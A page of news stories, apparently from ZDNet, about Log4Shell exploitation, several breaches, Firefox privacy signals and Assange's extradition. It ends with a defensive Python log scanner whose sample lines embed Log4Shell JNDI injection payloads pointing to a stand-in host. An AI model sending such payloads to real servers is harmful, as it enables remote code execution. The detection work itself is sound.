More stories

    Log4j flaw: Attackers are making thousands of attempts to exploit this severe vulnerability

    Cyber attackers are making over a hundred attempts to exploit a critical security vulnerability in the Java logging library Apache Log4j every minute, security researchers have warned. The Log4j flaw (also now known as “Log4Shell”) is a zero-day vulnerability (CVE-2021-44228) that first came to light on December 9, with warnings that it can allow unauthenticated remote code execution and access to servers. Log4j is used in many forms of enterprise and open-source software, including cloud platforms, web applications and email services, meaning that there’s a wide range of software that could be at risk from attempts to exploit the vulnerability. Attackers are already scanning the internet for vulnerable instances of Log4j, with cybersecurity researchers at Check Point warning that there are over 100 attempts to exploit the vulnerability every minute. Meanwhile, cybersecurity researchers at Sophos have warned that they’ve detected hundreds of thousands of attempts to remotely execute code using the Log4j vulnerability in the days since it was publicly disclosed, along with scans searching for the vulnerability. There are already active examples of attackers attempting to leverage Log4j vulnerabilities to install cryptocurrency-mining malware, and there are also reports of several botnets, including Mirai, Tsunami, and Kinsing, attempting to leverage it. Researchers at Microsoft have also warned about attacks attempting to take advantage of Log4j vulnerabilities, including a range of cryptomining malware, as well as active attempts to install Cobalt Strike on vulnerable systems, something that could allow attackers to steal usernames and passwords.

    It’s common for cyber criminals to make efforts to exploit newly disclosed vulnerabilities in order to have the best chance of taking advantage of them before they’re remediated – but in this case, the ubiquity of Log4j, and the fact that many organisations may be unaware that it’s part of their network, mean there could be a much larger window for attempts to scan for access. And while cyber criminals attempting to leverage Log4j vulnerabilities to install cryptomining malware might initially appear to be a relatively low-level threat, it’s likely that higher-level, more dangerous cyber attackers will attempt to follow.

    “I cannot overstate the seriousness of this threat. On the face of it, this is aimed at cryptominers but we believe this creates just the sort of background noise that serious threat actors will try to exploit in order to attack a whole range of high-value targets such as banks, state security and critical infrastructure,” said Lotem Finkelstein, director of threat intelligence and research for Check Point. The severity of the vulnerability in such a widely used library means that organisations and technology vendors are being urged to counter the threat as soon as possible. “In the case of this vulnerability CVE-2021-44228, the most important aspect is to install the latest updates as soon as practicable,” said an alert by the UK’s National Cyber Security Centre (NCSC). While the Log4j security issue only recently came to light, evidence suggests that attackers have been exploiting the vulnerability for some time before it was publicly disclosed.

    Log4j RCE activity began on December 1 as botnets start using vulnerability

    Image: Kevin Beaumont
    The usage of the nasty vulnerability in the Java logging library Apache Log4j that allows unauthenticated remote code execution could have kicked off as early as December 1. “Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,” Cloudflare CEO Matthew Prince said on Twitter. “That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.” Cisco Talos said in a blog post that it observed activity for the vulnerability known as CVE-2021-44228 from December 2, and those looking for indicators of compromise should extend their searches to at least that far back. Thanks to the ubiquity of the impacted library, Talos said it was seeing a lead time between attackers’ mass scanning and callbacks occurring, which could be due to vulnerable but non-targeted systems, such as SIEMs and log collectors, being triggered by the exploit. It added that the Mirai botnet was starting to use the vulnerability. Researchers at Netlab 360 said they had seen the Log4j vulnerability used to create Muhstik and Mirai botnets that went after Linux devices. Over the weekend, vendors have been rushing to get patches out and document workarounds for affected products. The end results have been product matrices such as those from VMware and Cisco where some products have patches available, some have workarounds, and others remain vulnerable. Both vendors scored CVE-2021-44228 as a perfect 10.

    The suggested workarounds typically either set the log4j2.formatMsgNoLookups flag to true, or remove the JndiLookup class from the classpath used by Java. A Reddit post from NCC Group is being regularly updated, and shows how the exploit can be used to exfiltrate AWS secrets, as well as all manner of Java system properties. One security researcher was able to trigger the exploit by going Little Bobby Tables on his iPhone name. Sophos said it was seeing the vulnerability already being used by cryptominers. On the more enjoyable front, a Minecraft mod developer was able to use the vulnerability to turn a Minecraft server into one that played Doom instead. “For some context, this is an entirely vanilla client connecting to a modded server, which, through this exploit, is sending over and executing the code to run doom,” Gegy said. Microsoft threat analyst Kevin Beaumont said defence in depth was “probably your best option”. “To give a spoiler for Log4Shell, this is going to take weeks to play out to establish attack surface (it is large) and then maybe a month or more for patches to be made available,” he said.

    Mozilla rolls out GPC for all Firefox users, but enforcement limited to two states

    Mozilla has expanded its implementation of Global Privacy Control (GPC) to all users after rolling it out on a limited basis in October. The feature – which tells websites not to sell or share your personal data – was only available in Firefox Nightly, their pre-release channel. But as of this week, GPC will be available for all Firefox users to turn on if they wish to. Unfortunately for most US users, this feature may not have much effect. The GPC is required under the California Consumer Protection Act (CCPA) and Europe’s Global Data Protection Regulation (GDPR) as well as Colorado’s privacy law, but no other states have laws that will enforce it. Even California and Colorado have faced backlash for loopholes in their laws that make it difficult to actually enforce the feature. Mozilla told ZDNet that GPC complements technical anti-tracking features integrated into Firefox, like Enhanced Tracking Protection and Total Cookie Protection. “By sending a signal to the websites that people visit, telling them that the person does not want to be tracked and does not want their data to be sold, it helps address the tracking conducted by websites through first-party cookies,” Mozilla said in a statement. “We think it can play an integral role in making a right to opt-out meaningful and easy to use for consumers. GPC is getting traction both in California and in Colorado. Now that we expect websites to start honoring GPC, we want to start providing this option to Firefox users. Yet, the rules around the enforceability of GPC under the CCPA remain ambiguous and leave space for businesses to ignore the signal sent by the browser on behalf of consumers.”

    The company noted that last month, they shared feedback with the California Privacy Protection Agency, encouraging the California AG and other privacy agencies globally to expressly require businesses to comply with GPC. Jennifer Hodges, Mozilla’s head of US public policy, said the GPC signal is sent by Firefox to websites regardless of the state the user is in. “However, the GPC may not be enforceable in jurisdictions without privacy legislation that include do not sell provisions which allow for the GPC signal to act as a universal opt-out,” Hodges explained. “For someone in a state that does not have a privacy law, the GPC may not be enforceable. California and Colorado are two states that have GPC-like provisions at the moment.” Hodges said history has shown that without a clear legal mandate, most businesses will not comply with consumer opt-out signals sent through browsers. “This vacuum is the same reason that Do Not Track (“DNT”) failed to gain adoption. It was eventually removed by all major browsers because it created a false sense of consumer protection that could not be enforced,” Hodges added. “The 2023 Colorado Privacy Law has taken this step, and the addition of California would pave the path for other global privacy regulators to similarly update their laws. In addition, we think that enforcement authorities should also expect businesses to interpret the GPC as governing both the direct sale of consumer’s information as well as the sharing of consumers’ information for programmatic advertising targeting purposes. Regulators, consistent with the intent of CCPA and CPRA, must step in to give tools like the GPC enforcement teeth and to ensure consumers’ choices are honored.”

    Volvo announces some R&D files stolen during cyberattack

    Volvo Cars has released a statement confirming a breach of sensitive files that resulted from a cyberattack. Volvo said it is now aware that “one of its file repositories has been illegally accessed by a third party.” “Investigations so far confirm that a limited amount of the company’s R&D property has been stolen during the intrusion. Volvo Cars has earlier today concluded, based on information available, that there may be an impact on the company’s operation,” Volvo said in a statement. “After detecting the unauthorised access, the company immediately implemented security countermeasures including steps to prevent further access to its property and notified relevant authorities.” Volvo added that it is still in the process of investigating the incident and has hired a cybersecurity firm to help “investigate the property theft.” The attack did not have “an impact on the safety or security of its customers’ cars or their personal data,” the company noted in their statement. But they conditioned the statement by saying this was only based on their “currently available information.” Bleeping Computer reported that the Snatch ransomware group has claimed responsibility for the attack after adding the company to its leak site on November 30. The group already published a small portion of the documents they stole on their leak site.

    According to Sophos, the group has been active since 2018 and gained notoriety in 2019 for a novel trick where they were able to bypass antivirus software by rebooting an infected computer into Safe Mode and running the ransomware’s file encryption process from there. The group became known for buying access into victim networks and lurking for days and weeks, expanding their foothold in a company before initiating the ransomware process. The group also became well known as a ransomware gang that engaged in data theft in addition to encrypting victim networks. Erich Kron, security awareness advocate at KnowBe4, said most ransomware is spread through phishing emails or through exploiting RDP instances open to the internet, noting that this was a hallmark of Snatch. “The Snatch gang makes great use of RDP in infection and lateral movement within an organization. To defend against these attacks, organizations are wise to ensure employees are trained on the importance of using complex passwords and not reusing passwords with other accounts. Organizations should also be on high alert for brute force attempts against RDP,” Kron said.

    UK High Court reverses course, approves Julian Assange's extradition to US

    A UK High Court has approved the extradition of WikiLeaks founder Julian Assange to the US. 

    Assange has been wanted by US authorities since the early 2010s for his role in acquiring and disseminating military and diplomatic documents via the WikiLeaks website. Following a long stint at Ecuador’s embassy in London, he was finally arrested in 2019, when his asylum was revoked. He has been indicted on 18 criminal counts, including 17 espionage charges. The collective maximum sentence for all charges comes to 175 years, but the US government has indicated that the actual imprisonment would be far, far shorter. This decision follows an earlier ruling made in January 2021, which denied the US request based on the court’s perception that it posed too great a risk to Assange’s wellbeing. The judge forbade the extradition due to “a recurrent depressive disorder which was severe in December 2019 and sometimes accompanied by psychotic features (hallucinations), often with ruminative suicidal ideas.” The new ruling takes concerns over Assange’s mental health into account, but it also integrates a series of four “assurances” made by US officials. These include: a promise that Assange will never be held under any “special administrative measures”; a commitment to never house him within a maximum security prison; a guarantee that he will be allowed to serve his final sentence in his native Australia, if he wishes; and a commitment to provide him with “appropriate clinical and psychological treatment as recommended by a qualified treating clinician at the prison where he is held.”

    Assange’s fiancée, Stella Morris, was outraged by the decision, telling the UK’s Sky News that his legal counsel intended to appeal the decision “at the earliest possible moment.” She called the repeal a “grave miscarriage of justice,” asking how the UK could allow him to be sent to a country that “plotted to kill him.” This final accusation likely relates to reporting from earlier this year, which claims that the Trump administration explored the possibility of forcibly kidnapping or assassinating Assange in 2017. The US government has never officially commented on this report. Assange remains a controversial figure, with organizations like Amnesty International and individuals like Edward Snowden still calling for his release based on concerns over preserving freedom of speech and the arrest’s chilling effect on investigative journalism. The US government, however, has never wavered in its stance that the WikiLeaks founder’s actions were criminal in nature, putting lives at risk by divulging classified information to enemies of the US.

    Assange’s legal team now has 14 days to file their appeal, which will delay any extradition proceedings until that filing is subsequently resolved. 


    German logistics giant Hellmann reports cyberattack

    Billion-dollar logistics firm Hellmann Worldwide Logistics reported a cyberattack this week that forced it to temporarily remove all connections to its central data center. The company said the shutdown was having a “material impact” on its business operations.

    The German company operates in 173 countries, running logistics for a range of air and sea freights as well as rail and road transportation services. Air Cargo News, which first reported the attack, said the company had a revenue of nearly $3 billion last year. In a statement, Hellmann said its Global Crisis Taskforce discovered the attack but outside cybersecurity experts were brought in to help with the response. “Operations will be restored step by step, with the security and integrity of the systems as the top priority,” reads the statement. The statement does not say if they were suffering from a ransomware attack, and the company did not respond to requests for comment. This is a particularly inopportune time for a global logistics firm like Hellmann to suffer from a cyberattack considering the role it plays in the global supply chain, explained Nasser Fattah, North America steering committee chair at Shared Assessments. “Today, the movement of goods is a global process that requires a concerted effort because the supply chain may include transportation, shipping, receiving, storage, and management of goods,” Fattah said.

    “The slightest kink in the chain can cause the business to suffer simply because of untimely deliveries. And businesses know that implementing seamless logistics is essential to keep pace with customer demands and remain competitive.”

    Brazilian Ministry of Health suffers cyberattack and COVID-19 vaccination data vanishes

    Websites under Brazil’s Ministry of Health (MoH) have suffered a major ransomware attack that resulted in the unavailability of COVID-19 vaccination data of millions of citizens. Following that attack that took place at around 1 am today, all of MoH’s websites including ConecteSUS, which tracks the trajectory of citizens in the public healthcare system, became unavailable. This includes the COVID-19 digital vaccination certificate, which is available via the ConecteSUS app.

    According to a message left by the Lapsus$ Group, which has claimed responsibility for the attack, some 50 TB worth of data has been extracted from the MoH’s systems and subsequently deleted. “Contact us if you want the data returned”, the message said, alongside contact details for the authors of the attack. Just before 7 am, the images with the message left by the hackers were removed, but the websites remained unavailable.

    Image: The image left by the hackers claiming the Ministry of Health attack

    Contacted by ZDNet about the measures in place to mitigate the attack and reestablish the systems, and whether there are backups for the data allegedly stolen from its systems, the Ministry of Health has not returned requests for comment at the time of writing. The incident follows a previous attack on the Brazilian Health Regulatory Agency (Anvisa) in September. The attack was focused on the healthcare declaration for travelers, compulsory for individuals entering Brazil via airports. The attack took place soon after the cancellation of the World Cup qualifier match between Brazil and Argentina, whereby Anvisa interrupted the game after four Argentinian players were accused of breaking COVID-19 travel protocols.

    Similarly, the latest issue faced by the Ministry of Health occurs amid increasing pressure on the Brazilian government to demand COVID-19 vaccination certificates from international travelers coming to Brazil, as a response to the rise of the omicron variant. This is not the first major security issue faced by Brazil’s Ministry of Health over the last few months. In November 2020, personal and health information of more than 16 million Brazilian COVID-19 patients was leaked online after a hospital employee uploaded a spreadsheet with usernames, passwords, and access keys to sensitive government systems on GitHub. Less than a week later, another major security incident emerged. The personal information of more than 243 million Brazilians, both living and deceased, was exposed online after web developers left the password for a crucial government database inside the source code of an official MoH website for at least six months.


    Security warning: New zero-day in the Log4j Java library is already being exploited

    A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers. Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution with the privileges of the user running the application that utilises the Java logging library. CERT New Zealand warns that it’s already being exploited in the wild. CISA has urged users and administrators to apply the recommended mitigations “immediately” in order to address the critical vulnerabilities.

    Systems and services that use the Java logging library Apache Log4j, between versions 2.0 and 2.14.1, are all affected, including many services and applications written in Java. The vulnerability was first discovered in Minecraft, but researchers warn that cloud applications are also vulnerable. The library is also used in enterprise applications, and it’s likely that many products will be found to be vulnerable as more is learned about the flaw. A blog post by researchers at LunaSec warns that anybody using Apache Struts is “likely vulnerable.”

    LunaSec said: “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it ‘Log4Shell’ for short.” Organisations can identify if they’re affected by examining the log files for any services using affected Log4j versions. If those logs contain user-controlled strings (CERT-NZ gives the example “Jndi:ldap”), the service could be affected. To mitigate the vulnerability, users should switch log4j2.formatMsgNoLookups to true by adding “-Dlog4j2.formatMsgNoLookups=True” to the JVM command used to start the application. To prevent the library being exploited, it’s urgently recommended that Log4j versions are upgraded to log4j-2.15.0-rc1. “If you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,” cybersecurity researchers at Randori wrote in a blog post. “If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly.”
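    As an added example (not code from the ZDNet article, CERT-NZ, Randori or the Log4j project), the following Python script implements the two defensive checks the coverage above describes: reviewing log lines for the JNDI lookup strings CERT-NZ points to, and checking whether a JVM argument list sets log4j2.formatMsgNoLookups to true, the workaround also mentioned in the Cisco and VMware coverage earlier on this page. It generalises the “Jndi:ldap” indicator to any JNDI scheme (ldap, rmi, dns and so on) and matches case-insensitively. The sample log lines, the IP addresses (RFC 5737 documentation ranges), the function names and the Finding type are all constructed for this example, and the rule that the last of several repeated -D flags wins is an assumption about JVM behaviour rather than something the article states.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Sequence

# Matches a JNDI lookup expression such as ${jndi:ldap://...} in logged text.
# The scheme is captured so a finding can report which lookup type was seen.
# Matching is case-insensitive, which covers CERT-NZ's "Jndi:ldap" spelling.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int   # 1-based line number in the scanned input
    scheme: str    # lowercased JNDI scheme, e.g. "ldap" or "rmi"
    excerpt: str   # surrounding text for the analyst to review


def scan_log_lines(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per JNDI lookup expression found in the log lines.

    Following CERT-NZ's guidance, any user-controlled string that reached a
    Log4j logger and contains a lookup expression is treated as an indicator
    that the service may have been targeted and needs investigation.
    """
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        for match in JNDI_LOOKUP.finditer(line):
            start = max(0, match.start() - 20)
            end = min(len(line), match.end() + 60)
            findings.append(Finding(line_no, match.group(1).lower(), line[start:end]))
    return findings


MITIGATION_FLAG = "-Dlog4j2.formatMsgNoLookups="


def jvm_args_disable_lookups(args: Sequence[str]) -> bool:
    """True if the JVM argument list enables the formatMsgNoLookups workaround.

    The value is compared case-insensitively, since Java's Boolean.parseBoolean
    accepts "True" as well as "true". If the flag appears more than once, the
    last occurrence is taken to win; that ordering rule is an assumption of this
    example about how the JVM resolves repeated -D options.
    """
    value = None
    for arg in args:
        if arg.startswith(MITIGATION_FLAG):
            value = arg[len(MITIGATION_FLAG):]
    return value is not None and value.strip().lower() == "true"


# Constructed sample access-log lines (not real traffic). Line 2 carries a
# lookup in the User-Agent field, line 4 carries one in the query string, and
# line 3 mentions "jndi" in an ordinary URL path to show it is not flagged.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [10/Dec/2021:03:12:44 +0000] "GET /index.html HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:03:12:51 +0000] "GET / HTTP/1.1" 200 1523 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:03:13:02 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 8800 "-" "curl/7.79.1"',
    '203.0.113.13 - - [10/Dec/2021:03:13:09 +0000] "GET /login?user=${JNDI:RMI://203.0.113.5:1099/x} HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {f.line_no}: jndi scheme={f.scheme} ...{f.excerpt}...")
    example_cmd = ["java", "-Xmx2g", "-Dlog4j2.formatMsgNoLookups=True", "-jar", "app.jar"]
    print("formatMsgNoLookups workaround present:", jvm_args_disable_lookups(example_cmd))
```

    The flag check only tells you whether the stopgap is in place; as the article says, upgrading Log4j is the recommended fix, and any hit from the log scan should be handled as Randori advises, as a possible active incident rather than a false alarm to be closed.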